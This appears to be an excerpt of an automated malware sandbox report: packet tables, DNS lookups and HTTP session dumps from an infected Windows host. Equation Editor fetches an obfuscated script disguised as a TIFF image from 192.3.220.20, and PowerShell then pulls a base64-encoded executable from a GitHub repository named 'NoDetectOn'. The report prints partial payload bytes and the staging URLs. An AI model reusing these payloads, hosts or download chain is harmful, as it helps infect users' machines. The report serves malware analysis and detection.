            Oct 5, 2024 14:49:49.894049883 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:49.894056082 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.894078016 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:49.894403934 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.894423962 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.894448996 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:49.894455910 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.894474983 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:49.894865036 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.894891024 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.894917965 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:49.894923925 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.894944906 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:49.937305927 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.937398911 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.937400103 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:49.937429905 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.937464952 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:49.937648058 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.937712908 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:49.937736988 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.937767029 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.937808990 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:49.990389109 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.990411997 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.990478992 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:49.990494013 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.990514040 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:49.990534067 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:49.991110086 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.991128922 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.991183043 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:49.991199017 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.991209030 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:49.991219044 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.991246939 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.991250992 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:49.991276026 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:49.991719961 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.991782904 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.991796017 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:49.991808891 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.991826057 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.991847992 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:49.991858959 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:49.991915941 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:49.993071079 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.993156910 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.993189096 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:49.993195057 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.993213892 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:49.993377924 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:49.993506908 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.993571043 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.993582010 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:49.993590117 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:49.993594885 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.993618965 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:49.993782043 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:49.994355917 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.994420052 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.994427919 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:49.994441986 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:49.994486094 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:50.025917053 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:50.025980949 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:50.025994062 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:50.026011944 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:50.026031971 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:50.026215076 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:50.026283026 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:50.026285887 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:50.026308060 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:50.026350975 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:50.078927040 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:50.079005003 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:50.079014063 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:50.079044104 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:50.079076052 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:50.079622984 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:50.079652071 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:50.079675913 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:50.079690933 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:50.079710960 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:50.079720974 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:50.079787016 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:50.096678972 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:50.096709967 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:50.096759081 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:50.096781969 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:50.096793890 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:50.096827984 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:50.096857071 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:50.096883059 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:50.096889973 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:50.096914053 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:50.096940994 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:50.097559929 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:50.097584009 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:50.097631931 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:50.097637892 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:50.097657919 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:50.097683907 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:50.097712040 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:50.097748995 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:50.097754955 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:50.097774029 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:50.097790003 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:50.117012024 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:50.117062092 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:50.117083073 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:50.117091894 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:50.117106915 CEST44349164185.199.109.133192.168.2.22
            Oct 5, 2024 14:49:50.117125988 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:50.117152929 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:50.119721889 CEST49164443192.168.2.22185.199.109.133
            Oct 5, 2024 14:49:50.179450989 CEST4916580192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:50.184403896 CEST8049165192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:50.184499025 CEST4916580192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:50.184653997 CEST4916580192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:50.189424038 CEST8049165192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:50.669167042 CEST8049165192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:50.794272900 CEST4916580192.168.2.22192.3.220.20
            TimestampSource PortDest PortSource IPDest IP
            Oct 5, 2024 14:49:46.962627888 CEST5456253192.168.2.228.8.8.8
            Oct 5, 2024 14:49:46.969119072 CEST53545628.8.8.8192.168.2.22
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Oct 5, 2024 14:49:46.962627888 CEST192.168.2.228.8.8.80xfc5eStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Oct 5, 2024 14:49:46.969119072 CEST8.8.8.8192.168.2.220xfc5eNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
            Oct 5, 2024 14:49:46.969119072 CEST8.8.8.8192.168.2.220xfc5eNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
            Oct 5, 2024 14:49:46.969119072 CEST8.8.8.8192.168.2.220xfc5eNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
            Oct 5, 2024 14:49:46.969119072 CEST8.8.8.8192.168.2.220xfc5eNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
            • raw.githubusercontent.com
            • 192.3.220.20
            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.2249163192.3.220.20803344C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            TimestampBytes transferredDirectionData
            Oct 5, 2024 14:49:42.432267904 CEST338OUTGET /100/newprojectwithnewthingstobecome.tIF HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Host: 192.3.220.20
            Connection: Keep-Alive
            Oct 5, 2024 14:49:42.899832964 CEST1236INHTTP/1.1 200 OK
            Date: Sat, 05 Oct 2024 12:49:42 GMT
            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
            Last-Modified: Thu, 03 Oct 2024 06:11:52 GMT
            ETag: "5a5c6-6238c6e479838"
            Accept-Ranges: bytes
            Content-Length: 370118
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: image/tiff
            Data Raw: ff fe 67 00 66 00 66 00 6d 00 51 00 4b 00 7a 00 70 00 41 00 4b 00 57 00 55 00 47 00 50 00 57 00 57 00 65 00 57 00 4c 00 4c 00 55 00 6b 00 4e 00 5a 00 4c 00 7a 00 55 00 53 00 6d 00 64 00 65 00 72 00 6f 00 70 00 41 00 62 00 6b 00 63 00 62 00 6f 00 42 00 71 00 66 00 49 00 6c 00 42 00 20 00 3d 00 20 00 22 00 65 00 51 00 68 00 62 00 47 00 62 00 62 00 48 00 42 00 76 00 6c 00 55 00 57 00 70 00 69 00 6f 00 4c 00 4c 00 57 00 6e 00 69 00 70 00 47 00 57 00 42 00 6d 00 51 00 57 00 47 00 6f 00 64 00 6f 00 7a 00 71 00 69 00 4c 00 50 00 61 00 71 00 47 00 6f 00 72 00 6b 00 57 00 78 00 78 00 22 00 0d 00 0a 00 4a 00 57 00 4c 00 47 00 76 00 4e 00 63 00 41 00 65 00 54 00 4c 00 4c 00 6f 00 47 00 4b 00 57 00 4e 00 4b 00 6d 00 55 00 62 00 4b 00 66 00 69 00 4c 00 64 00 4a 00 53 00 4c 00 78 00 4c 00 7a 00 50 00 4b 00 78 00 72 00 49 00 4f 00 57 00 4c 00 4e 00 51 00 4c 00 41 00 63 00 55 00 20 00 3d 00 20 00 22 00 6d 00 66 00 73 00 52 00 6d 00 50 00 47 00 54 00 63 00 69 00 55 00 65 00 4a 00 57 00 4c 00 68 00 50 00 43 00 55 00 [TRUNCATED]
            Data Ascii: gffmQKzpAKWUGPWWeWLLUkNZLzUSmderopAbkcboBqfIlB = "eQhbGbbHBvlUWpioLLWnipGWBmQWGodozqiLPaqGorkWxx"JWLGvNcAeTLLoGKWNKmUbKfiLdJSLxLzPKxrIOWLNQLAcU = "mfsRmPGTciUeJWLhPCUGSKUkmdbGpfWbLUzLKczhqBheea"uNhWNKhhhzKhNGuGULPdzBCcrKOoUJZBfsAKOzPNdtklUB = "WLiWWopeIPGPlWtKiCNhcGGLcpWmJLLHPTPtCNKZgixkWt"fpWxNznKLpqdeJmgsWWoJWKuiuWcaLfKfckPNgxeUWfllf = "TzKkNOTqWQlGxLbjficZnfKWPiLLZbLxofxcfpZCHLTWHf"cLLopARLsWkvLLflCHmObAKcxQzmBmLUTKGGaexJldTblO = "zLiRPJikKZLamL
            Oct 5, 2024 14:49:42.899862051 CEST224INData Raw: 00 7a 00 43 00 6e 00 50 00 61 00 68 00 63 00 57 00 41 00 50 00 67 00 4e 00 53 00 42 00 4c 00 74 00 4c 00 57 00 6d 00 6d 00 55 00 75 00 57 00 4c 00 52 00 69 00 57 00 4c 00 68 00 7a 00 42 00 68 00 22 00 0d 00 0a 00 65 00 65 00 63 00 74 00 6c 00 57
            Data Ascii: zCnPahcWAPgNSBLtLWmmUuWLRiWLhzBh"eectlWSifPfvNqqGLWSqUCOQKLjLWOLhkLLqaGWSmWlpeN = "dKWbQOKRKqikTWPcUiCdLtzoWft
            Oct 5, 2024 14:49:42.899874926 CEST1236INData Raw: 00 53 00 71 00 62 00 4c 00 4f 00 4b 00 62 00 68 00 69 00 74 00 41 00 72 00 62 00 41 00 4c 00 53 00 4b 00 62 00 5a 00 22 00 0d 00 0a 00 6d 00 57 00 53 00 51 00 65 00 47 00 78 00 66 00 42 00 70 00 6f 00 61 00 53 00 57 00 69 00 6c 00 4c 00 57 00 7a
            Data Ascii: SqbLOKbhitArbALSKbZ"mWSQeGxfBpoaSWilLWzdGmmNUqPBhGLLLdiLqWLWpSfWRN = "WkLlLAOnaTleuKqdgkGxvGUZUUJRUnmciWGWGbWkPUvKRb"
            Oct 5, 2024 14:49:42.899893045 CEST1236INData Raw: 00 5a 00 22 00 0d 00 0a 00 70 00 4a 00 50 00 43 00 6e 00 75 00 69 00 6f 00 62 00 57 00 69 00 4c 00 4c 00 52 00 47 00 62 00 6f 00 65 00 66 00 50 00 67 00 6b 00 6c 00 69 00 57 00 72 00 64 00 47 00 7a 00 55 00 6f 00 4b 00 4c 00 4c 00 55 00 4b 00 63
            Data Ascii: Z"pJPCnuiobWiLLRGboefPgkliWrdGzUoKLLUKcUxtLABQpf = "cdCPUukWmGiqKlzKKLxcgLNupGTLLWPzoqNWLLWzpiBZPi"LeWOUvZxlnkNvNbiUL
            Oct 5, 2024 14:49:42.899909019 CEST1236INData Raw: 00 61 00 4b 00 6e 00 4b 00 4b 00 4b 00 70 00 4b 00 47 00 57 00 68 00 63 00 70 00 57 00 6d 00 78 00 55 00 70 00 4c 00 5a 00 6f 00 7a 00 47 00 65 00 6f 00 63 00 20 00 3d 00 20 00 22 00 63 00 49 00 75 00 7a 00 75 00 6b 00 75 00 4f 00 47 00 55 00 6b
            Data Ascii: aKnKKKpKGWhcpWmxUpLZozGeoc = "cIuzukuOGUkLLafzOsLxmgZtthOKvcfWznziATWLtKLzdj"AnipzLNzqiifPkiCGpRLNpLmWxLLbiLZhUGilLzGUx
            Oct 5, 2024 14:49:42.899925947 CEST1236INData Raw: 00 7a 00 47 00 57 00 65 00 20 00 3d 00 20 00 22 00 65 00 65 00 4c 00 57 00 57 00 55 00 66 00 69 00 50 00 41 00 4c 00 65 00 7a 00 71 00 6e 00 47 00 76 00 55 00 41 00 47 00 6c 00 4b 00 57 00 4c 00 4f 00 6b 00 55 00 55 00 42 00 4c 00 51 00 64 00 57
            Data Ascii: zGWe = "eeLWWUfiPALezqnGvUAGlKWLOkUUBLQdWmKLnWqaTKsGnW"LeWQAGeeAcpCWJabkxZATBikqcOqjbWWbkmKNcJKLeZQgd = "KoGoWfdPkaeHpH
            Oct 5, 2024 14:49:42.900008917 CEST1236INData Raw: 00 69 00 47 00 62 00 6e 00 41 00 6d 00 7a 00 4c 00 55 00 65 00 4e 00 6d 00 70 00 43 00 70 00 5a 00 63 00 68 00 4b 00 57 00 72 00 5a 00 6f 00 55 00 75 00 4c 00 4f 00 4e 00 72 00 41 00 50 00 55 00 4b 00 65 00 6d 00 66 00 70 00 4a 00 4b 00 63 00 22
            Data Ascii: iGbnAmzLUeNmpCpZchKWrZoUuLONrAPUKemfpJKc"ixebicKPoLGClWaONWblxpiUUKIsKPmZWhRNlKlUiiLLWH = "qcWbLucLZkelAhLhGlqKbLAAZUNW
            Oct 5, 2024 14:49:42.900023937 CEST1236INData Raw: 00 64 00 55 00 6c 00 78 00 5a 00 55 00 57 00 57 00 71 00 57 00 47 00 55 00 62 00 68 00 41 00 6b 00 4b 00 57 00 5a 00 6d 00 6b 00 7a 00 57 00 6e 00 47 00 64 00 6b 00 4e 00 22 00 0d 00 0a 00 66 00 4e 00 75 00 4c 00 54 00 63 00 43 00 75 00 63 00 65
            Data Ascii: dUlxZUWWqWGUbhAkKWZmkzWnGdkN"fNuLTcCuceizcOTlWBfmqvbbnKBSifNKLNKTokgihGzbGn = "RihALNAzsdWUaPGGqWtLfapGNpQLZCkfZPPlGpZm
            Oct 5, 2024 14:49:42.900038004 CEST1236INData Raw: 00 42 00 55 00 4c 00 4e 00 4f 00 4e 00 6e 00 4e 00 6f 00 47 00 73 00 6e 00 57 00 64 00 22 00 0d 00 0a 00 57 00 72 00 5a 00 6f 00 68 00 70 00 62 00 70 00 41 00 4a 00 71 00 6b 00 71 00 4e 00 52 00 63 00 47 00 68 00 6e 00 4c 00 61 00 4f 00 4c 00 72
            Data Ascii: BULNONnNoGsnWd"WrZohpbpAJqkqNRcGhnLaOLriGpirZuWemKRkiWniLiiRK = "ktWKsWLdcNmtGsWGKBNiZczAaTLaGLPcZpcqTRxcUWzhLK"PLhob
            Oct 5, 2024 14:49:42.900230885 CEST1000INData Raw: 00 43 00 4e 00 52 00 4c 00 4b 00 48 00 52 00 62 00 7a 00 70 00 4c 00 47 00 74 00 4f 00 4e 00 57 00 62 00 4e 00 68 00 62 00 69 00 65 00 4a 00 49 00 69 00 65 00 69 00 41 00 69 00 47 00 41 00 69 00 55 00 49 00 51 00 76 00 6b 00 4c 00 49 00 20 00 3d
            Data Ascii: CNRLKHRbzpLGtONWbNhbieJIieiAiGAiUIQvkLI = "onkLSSaWLKlRpAtdBReWceWWLbGWTNomPZbUcWLCOenNNG"LOQWWOkuiShTmWdJfiicokxHTOGiP
            Oct 5, 2024 14:49:42.904881001 CEST1236INData Raw: 00 73 00 6f 00 68 00 55 00 4b 00 69 00 61 00 73 00 6d 00 6c 00 6e 00 47 00 62 00 41 00 75 00 6b 00 4c 00 57 00 4b 00 4c 00 50 00 75 00 4b 00 55 00 47 00 78 00 6e 00 75 00 72 00 55 00 57 00 70 00 61 00 57 00 41 00 66 00 65 00 6e 00 20 00 3d 00 20
            Data Ascii: sohUKiasmlnGbAukLWKLPuKUGxnurUWpaWAfen = "KoqGZUcKKKWepuzQaGiAKlbWckhGCRfsLHomzLktUiNNiB"hOmxkiuLqUxcZOoKtObcrkKiLKhcLe


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.2249165192.3.220.20803652C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            TimestampBytes transferredDirectionData
            Oct 5, 2024 14:49:50.184653997 CEST75OUTGET /100/RRFGV.txt HTTP/1.1
            Host: 192.3.220.20
            Connection: Keep-Alive
            Oct 5, 2024 14:49:50.669167042 CEST539INHTTP/1.1 404 Not Found
            Date: Sat, 05 Oct 2024 12:49:50 GMT
            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
            Content-Length: 298
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: text/html; charset=iso-8859-1
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 33 2e 32 32 30 2e 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 192.3.220.20 Port 80</address></body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.2249164185.199.109.1334433652C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            TimestampBytes transferredDirectionData
            2024-10-05 12:49:47 UTC128OUTGET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1
            Host: raw.githubusercontent.com
            Connection: Keep-Alive
            2024-10-05 12:49:47 UTC900INHTTP/1.1 200 OK
            Connection: close
            Content-Length: 2935468
            Cache-Control: max-age=300
            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
            Content-Type: text/plain; charset=utf-8
            ETag: "df9ff7aedbae4b4f50e2ae3a8f13fd0b84c66fbd35e7ac0df91a7a47b720c032"
            Strict-Transport-Security: max-age=31536000
            X-Content-Type-Options: nosniff
            X-Frame-Options: deny
            X-XSS-Protection: 1; mode=block
            X-GitHub-Request-Id: DB2B:109C2C:5465:6A01:670135EB
            Accept-Ranges: bytes
            Date: Sat, 05 Oct 2024 12:49:47 GMT
            Via: 1.1 varnish
            X-Served-By: cache-nyc-kteb1890066-NYC
            X-Cache: MISS
            X-Cache-Hits: 0
            X-Timer: S1728132588.734337,VS0,VE155
            Vary: Authorization,Accept-Encoding,Origin
            Access-Control-Allow-Origin: *
            Cross-Origin-Resource-Policy: cross-origin
            X-Fastly-Request-ID: 8c8e13a889167e92b8e1b010c812ae215cfebb29
            Expires: Sat, 05 Oct 2024 12:54:47 GMT
            Source-Age: 0
            2024-10-05 12:49:47 UTC1378INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 41 4f 50 39 57 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 4a 41 68 41 41 41 47 41 41 41 41 41 41 41 41 33 71 38 68 41 41 41 67 41 41 41 41 77 43 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
            Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAOP9WYAAAAAAAAAAOAADiELATAAAJAhAAAGAAAAAAAA3q8hAAAgAAAAwCEAAABAAAAgAAAAAgA
            2024-10-05 12:49:47 UTC1378INData Raw: 41 41 42 67 41 41 41 44 67 41 41 41 41 41 4b 67 49 44 66 51 55 41 41 41 51 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 41 51 41 41 51 35 30 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 6a 48 2f 2f 2f 2f 41 45 59 6f 45 67 41 41 42 67 49 6f 43 51 41 41 42 69 67 42 41 41 41 4b 4b 67 41 41 45 7a 41 44 41 47 30 41 41 41 41 42 41 41 41 52 49 41 45 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 49 41 41 41 41 46 41 41 41 41 47 51 41 41 41 44 67 41 41 41 41 41 41 69 67 55 41 41 41 47 41 32 38 46 41 41 41 47 4b 42 55 41 41 41 59 71 46 69 6f 43 4b 42 4d 41 41 41 59 44 4b 42 4d 41 41 41 59 6f 41 67 41 41 43 6a 6e 6f 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 75 45 41 41 45 4f 72 44 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 70 66 2f 2f 2f
            Data Ascii: AABgAAADgAAAAAKgIDfQUAAAQgAAAAAH6EEAAEe0AQAAQ50v///yYgAAAAADjH////AEYoEgAABgIoCQAABigBAAAKKgAAEzADAG0AAAABAAARIAEAAAD+DgAAOAAAAAD+DAAARQIAAAAFAAAAGQAAADgAAAAAAigUAAAGA28FAAAGKBUAAAYqFioCKBMAAAYDKBMAAAYoAgAACjno////IAAAAAB+hBAABHsuEAAEOrD///8mIAAAAAA4pf///
            2024-10-05 12:49:47 UTC1378INData Raw: 49 41 45 41 41 41 41 34 6d 66 2f 2f 2f 77 49 4f 42 48 30 4a 41 41 41 45 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 61 45 41 41 45 4f 58 33 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 63 76 2f 2f 2f 7a 49 43 4b 42 6b 41 41 41 59 6f 4a 77 41 41 42 69 6f 41 41 41 41 54 4d 41 4d 41 6b 51 41 41 41 41 4d 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 42 41 41 41 41 41 59 41 41 41 41 46 41 41 41 41 4c 41 41 41 41 46 49 41 41 41 41 34 41 51 41 41 41 43 6f 52 41 53 67 6b 41 41 41 47 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 2f 45 41 41 45 4f 73 72 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 76 2f 2f 2f 2f 78 45 42 4f 64 4c 2f 2f 2f 38 67 41 41 41 41 41 48 36 45 45 41 41 45 65 33 77 51 41 41 51 36 70 50 2f 2f 